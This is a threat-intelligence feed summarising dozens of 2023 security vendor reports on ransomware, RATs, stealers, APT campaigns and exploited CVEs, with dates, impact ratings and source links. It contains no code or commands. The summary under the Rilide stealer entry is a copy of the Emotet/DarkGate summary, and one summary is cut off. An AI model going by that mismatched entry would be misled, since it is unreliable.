- Summary:
- ASEC (AhnLab Security Emergency response Center) has recently discovered new malware disguised with coin exchange and investment-related themes. The malware takes the form of an executable and a Word file. It is suspected to have been created by the Kimsuky group.
—
- Intel Source:
- ASEC
- Intel Name:
- The_malware_installation_as_normal_file_of_a_Korean_Development_Company
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- AhnLab has previously covered malware delivered through the installation file of a Korean program development company. When malware is distributed alongside a legitimate installer, users struggle to notice that the malware is executing concurrently.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Investigating_the_Big_Head_Ransomware
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- Big Head ransomware, which first appeared in May 2023, is a relatively new entrant in the threat landscape. It comprises several variants, each with its own features and capabilities. Little is known about the threat actor responsible for Big Head; the actor has been seen interacting with victims on Telegram and through email.
Source:
https://socradar.io/dark-web-profile-big-head-ransomware/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- An_Overview_of_Qakbot_Infrastructure
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- Team-Cymru researchers have provided an update on their high-level analysis of QakBot infrastructure. This is ongoing research: their analysis of QakBot is fluid, with various hypotheses being identified and tested, and they will provide further written updates as they uncover new insights into QakBot campaigns.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory
—
- Intel Source:
- TrendMicro
- Intel Name:
- TargetCompany_Ransomware_Abusing_FUD_Obfuscator_Packers
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- To deploy its initial stage persistently, the most recent version of the TargetCompany ransomware first exploits weak SQL servers. The code tries several approaches to achieve persistence, such as changing the URLs or relevant paths, until it finds a location from which to run the Remcos RAT.
—
- Intel Source:
- Fortinet
- Intel Name:
- DoDo_and_Proton_Ransomware_targeting_windows_users
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Fortinet’s Ransomware Roundup report highlights the emerging DoDo and Proton ransomware variants, both designed to target Microsoft Windows users. DoDo ransomware, a derivative of Chaos ransomware, disguises itself as an “educational” application called “Mercurial Grabber” to steal information and encrypt victims’ files; its recent variants demand a ransom for both file decryption and data non-disclosure. Proton ransomware encrypts files on Windows systems and demands a ransom for file recovery.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-dodo-and-proton
—
- Intel Source:
- Trend Micro
- Intel Name:
- Water_minyades_batloader_malware
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observe that the Water Minyades Batloader malware has evolved with Pyarmor Pro obfuscation, making manual de-obfuscation difficult. Using large MSI files, it initiates a sophisticated kill chain, fingerprinting victim networks and delivering second-stage payloads for stealthy attacks.
Source:
https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html
—
- Intel Source:
- Talos
- Intel Name:
- New_Threat_Actor_Leveraging_Customized_Yashma_Ransomware
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified an unknown threat actor, who appears to be of Vietnamese descent, who has been operating ransomware since at least June 4, 2023. This continuing attack makes use of a Yashma ransomware version that mimics WannaCry traits and is expected to target several locations. The ransom note is sent using an unusual method by the threat actor. They execute an embedded batch file to download the ransom note from the actor-controlled GitHub repository rather than inserting the ransom note strings in the malware.
Source:
https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/
—
- Intel Source:
- SentinelOne
- Intel Name:
- North_Korea_icompromised_Russian_Missile_Engineering_Company
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya. Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
—
- Intel Source:
- CERT UA
- Intel Name:
- MerlinAgent_cyber_attacks_against_Ukraine
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Ukraine’s CERT-UA is warning of malicious emails posing as official communications. The emails contain harmful attachments, leading to the execution of dangerous scripts and the deployment of the malicious “ctlhost.exe” associated with the MerlinAgent program.
—
- Intel Source:
- Security Affairs
- Intel Name:
- NPM_highly_targeted_attacks
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Security Affairs researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data.
Source:
https://securityaffairs.com/149165/hacking/npm-highly-targeted-attacks.html
—
- Intel Source:
- PT Security
- Intel Name:
- The_Cyber_Campaign_by_Space_Pirates_in_Russia_and_Serbia
- Date of Scan:
- 2023-08-05
- Impact:
- MEDIUM
- Summary:
- Using unique strategies and acquiring new cyber weapons, the threat actor known as Space Pirates has been connected to attacks on at least 16 organizations in Serbia and Russia over the past year. Governmental organizations, educational institutions, private security firms, aerospace makers, agricultural producers, defense, energy, and healthcare companies are among the targets.
—
- Intel Source:
- Any.Run
- Intel Name:
- Remcos_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Any.Run malware hunting service recorded a video of Remcos RAT execution and analysis. Remcos is a remote access trojan, malware used to take remote control over infected PCs. This trojan is created and sold to clients by a “business” called Breaking Security. The Remcos trojan can be delivered in different forms. Based on the RAT’s analysis, it can be spread as an executable file with a name intended to convince users to open it, or it pretends to be a Microsoft Word file that exploits vulnerabilities.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_Small_LNK_to_Large_Malicious_BAT_File_With_Zero_VT_Score
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- An ISC SANS researcher reported that their spam trap caught an e-mail with an LNK attachment; the e-mail message was the usual malspam fare, trying to appear as a purchase order sent to the recipient.
Source:
https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/
—
- Intel Source:
- Any Run
- Intel Name:
- Redline_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- ANY.RUN researchers did the analysis and watched the RedLine malware actions in an interactive sandbox simulation. RedLine Stealer or RedLine is malware that can collect users’ confidential information and deliver other malicious programs.
—
- Intel Source:
- MetaBase Q
- Intel Name:
- Botnet_Fenix_new_botnet
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Threat Intel team at Metabase Q has discovered a local group that created a new botnet called “Fenix,” which specifically targets users accessing government services, particularly tax-paying individuals in Mexico and Chile. The attackers redirect victims to fraudulent websites that mimic the official portals. These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety.
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Play_ransomware_activity
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- Trend Micro has observed the Play ransomware group amplifying its activity with a number of new tools and exploits, including the vulnerabilities ProxyNotShell, OWASSRF, and a Microsoft Exchange Server remote code execution flaw. More recently, it has also begun to use new tools like Grixba, a custom network scanner and infostealer, and the open-source VSS management tool AlphaVSS.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play
—
- Intel Source:
- Securelist
- Intel Name:
- Emotet_DarkGate_and_LokiBot_new_analyses
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
Source:
https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Attack_Method_of_Rhysida_Ransomware
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Rhysida Ransomware Group has become a serious threat in the online environment. In a short period of time, Rhysida posed a significant concern to businesses all across the world with its powerful encryption capabilities and double extortion tactics. The group’s emphasis on attacking military and governmental institutions, as seen in their assault on the Chilean Army, emphasizes how serious their actions may be.
Source:
https://socradar.io/threat-profile-rhysida-ransomware/
—
- Intel Source:
- McAfee
- Intel Name:
- The_Back_to_School_Scams
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- McAfee Labs analysts have discovered the following PDFs targeting back-to-school trends. Their article warns parents about what to educate their children on and how not to fall victim to such fraud. McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, purportedly to verify human interaction.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-season-of-back-to-school-scams/
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Rilide_Stealer_Version
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_Sent_Phishing_Emails_Masquerading_as_Microsoft_Teams_Chats
- Date of Scan:
- 2023-08-03
- Impact:
- MEDIUM
- Summary:
- In “highly targeted social engineering attacks,” hackers within the Russian military utilized Microsoft Teams discussions as phishing baits. The IT giant announced on Wednesday that it has discovered a campaign by the well-known Russian hacker collective Midnight Blizzard, also known as NOBELIUM, Cozy Bear, or APT29. According to U.S. and U.K. law enforcement organizations, the group is a component of the Russian Federation’s Foreign Intelligence Service.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Russian_APT_BlueCharlie_Swaps_Infrastructure_to_Evade_Detection
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- Researchers from Recorded Future have identified the latest campaign from BlueCharlie. The group completely switched up its infrastructure, creating nearly 100 new domains from which to perform credential harvesting and follow-on espionage attacks.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0802.pdf
—
- Intel Source:
- SentinelOne
- Intel Name:
- Illicit_Brand_Impersonation
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- SentinelOne researchers continually observe brands being impersonated for illicit use, including credential phishing and malware delivery. In their blog they share examples of opportunistic and targeted threat actors impersonating trusted brands, and they make use of new tooling for the purposes of hunting and tracking them going forward.
Source:
https://www.sentinelone.com/blog/illicit-brand-impersonation-a-threat-hunting-approach/
—
- Intel Source:
- ASEC
- Intel Name:
- Linux_Systems_Are_Affected_by_Reptile_Malware
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed Reptile, an open-source Linux rootkit with powerful concealment features and port knocking capabilities. The report examines real-world attacks, including those targeting Korean companies, and draws parallels to the Mélofée malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Sliver_C2_malware_being_distributed
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed malware similar to the previously reported SparkRAT being distributed disguised as setup files for Korean VPN service providers and marketing program producers. Unlike the past cases where SparkRAT was used, Sliver C2 was used in the recent attacks, and techniques to avoid detection were employed.
—
- Intel Source:
- CISA
- Intel Name:
- Attackers_Exploiting_Ivanti_EPMM_Vulnerabilities
- Date of Scan:
- 2023-08-02
- Impact:
- MEDIUM
- Summary:
- In response to the active exploitation of CVE-2023-35078 and CVE-2023-35081, the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) have released a joint cybersecurity advisory. From at least April 2023 to July 2023, advanced persistent threat actors used CVE-2023-35078 as a zero-day exploit to collect data from a number of Norwegian enterprises as well as to access and compromise the network of a Norwegian government agency.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a
—
- Intel Source:
- Halcyon
- Intel Name:
- Ransomware_Command_and_Control_Providers_report
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Halcyon researchers shared research describing new techniques used to unmask yet another ransomware economy player that speeds up ransomware attacks and state-sponsored APT operations: Command-and-Control Providers (C2P), who sell services to threat actors while assuming a legal business profile. In their report, titled Cloudzy with a Chance of Ransomware, Halcyon showed a unique method for identifying C2P entities that can be used to forecast the precursors to major ransomware campaigns and other advanced attacks. Halcyon also identifies two new, previously undisclosed ransomware affiliates, which it named Ghost Clown and Space Kook, that currently deploy BlackBasta and Royal, respectively.
—
- Intel Source:
- Cado Security
- Intel Name:
- New_P2Pinfect_Malware_Campaign_Against_Redis_Servers_Detailed
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Cado Security Labs have just discovered a brand-new malware campaign that targets Redis data store deployments that are open to the general public. The malware, which was created in Rust and given the name “P2Pinfect” by the creators, functions as a botnet agent. An embedded Portable Executable (PE) and an additional ELF executable are both included in the sample that researchers analyzed, indicating cross-platform compatibility between Windows and Linux.
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Variant_of_SkidMap_Targeting_Redis
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Trustwave examined the most recent logs from a honeypot in central Europe and discovered an intriguing entry that appeared again less than two weeks later. SkidMap targets only open Redis instances (those with no authentication, i.e., “NO AUTH”). They have not noticed brute-force attacks coming from the precise IP where the initial attack started.
—
- Intel Source:
- PaloAlto
- Intel Name:
- NodeStealer_2_0_The_Python_Version
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Unit 42 researchers have recently discovered a previously unreported phishing campaign that distributed an infostealer equipped to fully take over Facebook business accounts. Facebook business accounts were targeted with a phishing lure offering tools such as spreadsheet templates for busines
Source:
https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/
—
- Intel Source:
- Cyble
- Intel Name:
- The_Cunning_XWorms_Multi_Staged_Attack
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- The XWorm malware uses a new multistage approach to deliver its payload utilizing LOLBins, according to an analysis by Cyble researchers.
Source:
https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/
—
- Intel Source:
- Proofpoint
- Intel Name:
- WikiLoader_Favors_Complex_Evasion
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- WikiLoader is a new piece of malware that Proofpoint researchers have discovered. It was originally observed in December 2022 being delivered by TA544, an attacker who frequently targets Italian enterprises with Ursnif malware. They also noticed several subsequent campaigns, the majority of which had Italian organizations as their target.
Source:
https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion
—
- Intel Source:
- Team-Cymru
- Intel Name:
- The_IcedID_BackConnect_Protocol_Internals
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have updated their investigation and monitoring of the infrastructure linked to IcedID’s BackConnect protocol.
Source:
https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2
—
- Intel Source:
- Avast
- Intel Name:
- The_Unknown_Risks_of_Dot_Zip_Domains
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Cybercriminals have begun using .zip domains to trick people into thinking they are downloadable files rather than URLs, according to Avast researchers. According to the research, one-third of the top 30 .zip domains blacklisted by threat detection engines misuse the names of well-known IT firms like Microsoft, Google, Amazon, and PayPal to deceive users into thinking they are files from reputable businesses.
Source:
https://decoded.avast.io/matejkrcma/unpacking-the-threats-within-the-hidden-dangers-of-zip-domains/
—
- Intel Source:
- PaloAlto
- Intel Name:
- URLs_That_Deliver_Ransomware
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have seen that threat actors are increasingly using URLs to deliver ransomware as they look for new ways to get their inventions past victims’ defenses. Additionally, they are utilizing more dynamic behaviors to spread their malware. Threat actors frequently switch hostnames, paths, filenames, or a combination of all three to disperse ransomware, in addition to following the tried-and-true method of deploying polymorphic variants of their ransomware.
Source:
https://unit42.paloaltonetworks.com/url-delivered-ransomware/#post-129339-_cfw3vjr99swz
—
- Intel Source:
- CISA
- Intel Name:
- v2_SUBMARINE_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- The US Cybersecurity and Infrastructure Security Agency (CISA), part of the Department of Homeland Security, has released a report on a new backdoor that threat actors used to gain access to email security appliances. CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001 through 9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209a
—
- Intel Source:
- Bitdefender
- Intel Name:
- Threat_Actors_Abusing_the_Ad_Network
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- A threat actor with previous roots in cybercrime has shifted its initial access techniques to search engine advertisements to hijack searches for business applications such as AnyDesk, WinSCP, Cisco AnyConnect, Slack, TreeSize and potentially more. Bitdefender research showed that the actor(s) has successfully used this type of attack since late May 2023. Based on their threat insights, attackers seem to exclusively focus on North America. Until now, we have identified six target organizations in the US and one in Canada.
—
- Intel Source:
- Dr. Web
- Intel Name:
- Fruity_Trojan_Downloaders_Infect_Windows_Systems_in_Multiple_Stages
- Date of Scan:
- 2023-07-31
- Impact:
- LOW
- Summary:
- Dr.Web researchers have observed that threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity, with the goal of installing remote access trojans like Remcos RAT.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Analyses_Report_v1_Exploit_Payload_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209c
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- STARK_MULE_Targeting_Koreans_With_US_Military_Themed_Document_Lures
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have detected an ongoing cyber assault campaign that is targeting Korean-speaking people by using document lures with American military themes to fool them into launching malware on compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- SEASPY_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209b
—
- Intel Source:
- Blackberry
- Intel Name:
- Behavioral_detection_tips_for_the_RomCom_campaign
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- This article provides a technical analysis of the RomCom threat group, which is targeting politicians in Ukraine and U.S.-based healthcare organizations. It outlines process activity, IoCs, and Sigma rules to detect malicious behavior, such as the execution of a file from the Temp folder with a specific command line, and the use of COM objects to establish system persistence.
Source:
https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection
—
- Intel Source:
- Recorded Future
- Intel Name:
- BlueBravo_Attacks_European_Diplomatic_Entities
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- In order to deliver a new backdoor named GraphicalProton, the Russian nation-state actor known as BlueBravo has been detected targeting diplomatic institutions around Eastern Europe. This illustrates the threat’s ongoing evolution. The use of lawful internet services (LIS) for command-and-control (C2) obfuscation is a defining feature of the phishing campaign.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf
—
- Intel Source:
- Sophos
- Intel Name:
- A_New_Malicious_Campaign_Distributing_IT_Tools
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Researchers from Sophos have discovered a new malvertising campaign that targets users looking for IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP by using ads on Google Search and Bing. This campaign attempts to trick users into downloading trojanized installers in order to access corporate networks and possibly launch future ransomware attacks.
Source:
https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/
—
- Intel Source:
- Sophos
- Intel Name:
- The_discover_of_apps_targeting_Iranian_bank_customers
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Sophos X-Ops researchers discovered malicious apps targeting Iranian banks, which collect internet banking login credentials and credit card details, and have capabilities such as hiding icons and intercepting SMS messages. The threat actors used Firebase as a C2 mechanism and leveraged legitimate domains for C2 servers. The malware also searches for other banking, payment, and cryptocurrency apps, and the certificate used to sign the malicious apps was previously used by an IT consulting and development firm in Malaysia. The malicious apps request permissions to read SMS messages and urge users to grant them.
Source:
https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/
—
- Intel Source:
- GitHub Blog
- Intel Name:
- Jade_Sleet_Storm_0954_Social_Engineering_Campaign
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- GitHub has observed a Jade Sleet social engineering campaign which targets employees of technology firms, specifically those connected to the blockchain, cryptocurrency, online gambling, and cybersecurity sectors. Jade Sleet (Storm-0954) is an activity group originating from North Korea that specializes in targeting cryptocurrency-related organizations. They utilize a range of tactics, like the development of applications that look like legitimate cryptocurrency apps, to spread their attacks. Jade Sleet has used the multi-platform targeted malware framework (MATA) and Electron frameworks to create implants for both Microsoft Windows and Mac-based systems.
—
- Intel Source:
- ICS CERT
- Intel Name:
- Attack_Tactics_Against_Industrial_Organizations
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky ICS CERT have looked at a number of assaults on commercial targets in Eastern Europe. The attackers’ goal in the attacks was to create an ongoing conduit for data exfiltration, including data from air-gapped systems. Based on the commonalities between these operations and other efforts that have been previously studied (such as ExCone and DexCone), including the use of FourteenHi variants, particular TTPs, and the scale of the attack.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Diving_Deep_into_Mallox_Ransomware
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have observed an uptick of Mallox ransomware activities with an increase of almost 174% compared to the previous year exploiting MS-SQL servers to distribute the ransomware. Mallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft Windows systems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims’ networks.
Source:
https://unit42.paloaltonetworks.com/mallox-ransomware/
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Investigation_of_Cloud_Compute_Resource_Abuse
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Microsoft researchers have observed an attack targeting organizations that incurred more than $300,000 in computing fees due to cryptojacking attacks.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Developers_via_Trojanized_MS_Visual_Studio
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered a deceitful installer masquerading as an authentic Microsoft Visual Studio installer delivering a Cookie Stealer. This stealer is specifically designed to infiltrate and extract sensitive information stored in browser cookies, allowing attackers to compromise user accounts and invade privacy.
Source:
https://blog.cyble.com/2023/07/25/threat-actor-targeting-developers-via-trojanized-ms-visual-studio/
—
- Intel Source:
- Trellix
- Intel Name:
- Exploiting_of_the_search_ms_URI_Protocol_Handler
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the use of malicious payloads, such as AsyncRAT and Remcos RAT, by attackers to gain remote control over an infected system. It also covers the use of the “search” / “search-ms” URI protocol handler to launch attacks using a variety of file types, and how to disable this protocol handler. Additionally, it provides configuration information for AsyncRAT, including two IP addresses, six ports, a default botnet, a version number, and various settings.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
—
- Intel Source:
- ASEC
- Intel Name:
- PurpleFox_Loader_Distributing_via_MS_SQL_Server
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the PurpleFox malware being installed on poorly managed MS-SQL servers. PurpleFox is a Loader that downloads additional malware and is known to mainly install CoinMiners.
—
- Intel Source:
- Zscaler
- Intel Name:
- In_depth_Campaign_Analysis_of_QakBot
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have conducted in-depth investigations to uncover the various attack chains employed by Qakbot. In this research, they delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods.
—
- Intel Source:
- Sygnia
- Intel Name:
- Casbaneiro_Infection_Chain_is_Back
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Sygnia researchers have observed that threat actors behind the Casbaneiro campaign are still active to this day, with some changes over the years in their attack chain, C2 infrastructure, and TTPs. The threat actors are still making effective use of spear-phishing attack to initiate their infection chain, and still appear to be focused on Latin American targets.
Source:
https://blog.sygnia.co/breaking-down-casbaneiro-infection-chain-part2
—
- Intel Source:
- Splunk
- Intel Name:
- The_Analysis_of_Amadey_Threat
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The Amadey Trojan Stealer, an active and prominent malware, first emerged on the cybersecurity landscape in 2018 and has maintained a persistent botnet infrastructure ever since. Several campaigns have used this malware.
Source:
https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Threat_Group_Attacking_Windows_Servers
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered that Lazarus, a threat group deemed to be nationally funded, is attacking Windows Internet Information Service (IIS) web servers and using them as distribution points for their malware.
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_Deceptive_and_Evolving_Malware_Tool
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyfirma has identified a new threat in the cybersecurity landscape – Attacker-Crypter. This powerful tool allows cybercriminals to encrypt, obfuscate, and manipulate malicious code, evading detection by security tools and antivirus software. The freely available tool offers various features to enhance malware capabilities, including process injection, debugger evasion, and network communication.
—
- Intel Source:
- Aquasec
- Intel Name:
- Tomcat_attacked_by_Mirai_Malware_and_beyond
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the misconfiguration of Apache Tomcat, the impact of the malware ‘l4sd4sx64’, and the prevalence of Apache Tomcat in cloud, big data, and website development. It also provides an analysis of the attacks against Tomcat server honeypots over a two-year period, including the detection of a web shell hidden in a WAR file, the execution of a shell script, and the execution of the Mirai malware.
Source:
https://blog.aquasec.com/tomcat-under-attack-investigating-the-mirai-malware
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Deep_Investigation_of_JumpCloud_System_Breach
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have investigated the JumpCloud system breach and its impact on customers. Mandiant attributed these intrusions to UNC4899, a Democratic People’s Republic of Korea (DPRK)-nexus actor, with a history of targeting companies within the cryptocurrency vertical.
Source:
https://www.mandiant.com/resources/blog/north-korea-supply-chain
—
- Intel Source:
- Checkmarx
- Intel Name:
- Targeted_Open_Source_Software_Supply_Chain_Attacks_on_Banking_Sector
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The banking sector is facing targeted open-source software supply chain attacks. Malicious actors exploit vulnerabilities in open-source packages, utilizing advanced techniques and deceptive tactics. Traditional controls fall short, necessitating proactive security measures throughout the Software Development Lifecycle (SDLC). Collaboration is key to strengthen defenses against these evolving threats. Checkmarx’s Supply Chain Intelligence offers protection and ongoing tracking.
Source:
https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/
—
- Intel Source:
- Fortinet
- Intel Name:
- Cl0p_Ransomware_Financially_Motivated_Menace_Exploiting_Critical_Vulnerabilities
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Cl0p ransomware, operated by the FIN11 threat group, has been a persistent and financially motivated menace since early 2019. This malicious software targets organizations in North America and Europe, encrypting files and exfiltrating sensitive data. Recent attacks have exploited critical vulnerabilities in software, including the MOVEit Transfer SQL injection flaw. The ransom group demands payment in exchange for file decryption and to prevent the public exposure of stolen information.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-cl0p
—
- Intel Source:
- Proofpoint
- Intel Name:
- Scammers_Targeting_Universities_With_Bioscience_Lures
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have seen a campaign that targets university students in North America in late May 2023 using a variety of email lures with job-related themes. The emails claimed to be from several different organizations, the bulk of which were involved in the biosciences, healthcare, and biotechnology, as well as a few other unrelated ones. The operation went on until June 2023.
—
- Intel Source:
- Fortinet
- Intel Name:
- Zyxel_Vulnerability_Targeted_by_DDoS_Botnets
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard have discovered several DDoS botnets that are taking advantage of the Zyxel vulnerability (CVE-2023-28771). The vulnerability is a command injection bug affecting several firewall models: an unauthenticated attacker can execute arbitrary code by sending a specially crafted packet to the targeted device.
Source:
https://www.fortinet.com/blog/threat-research/ddos-botnets-target-zyxel-vulnerability-cve-2023-28771
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_Rusty_peer_to_Peer_self_Replicating_worm_Called_P2PInfect
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Cloud researchers at Unit 42 have found a fresh peer-to-peer (P2P) worm that they named P2PInfect. This worm is capable of cross-platform infections and is written in the highly scalable and cloud-friendly programming language Rust. It targets Redis, a well-known open-source database application that is frequently utilized in cloud environments.
Source:
https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/
—
- Intel Source:
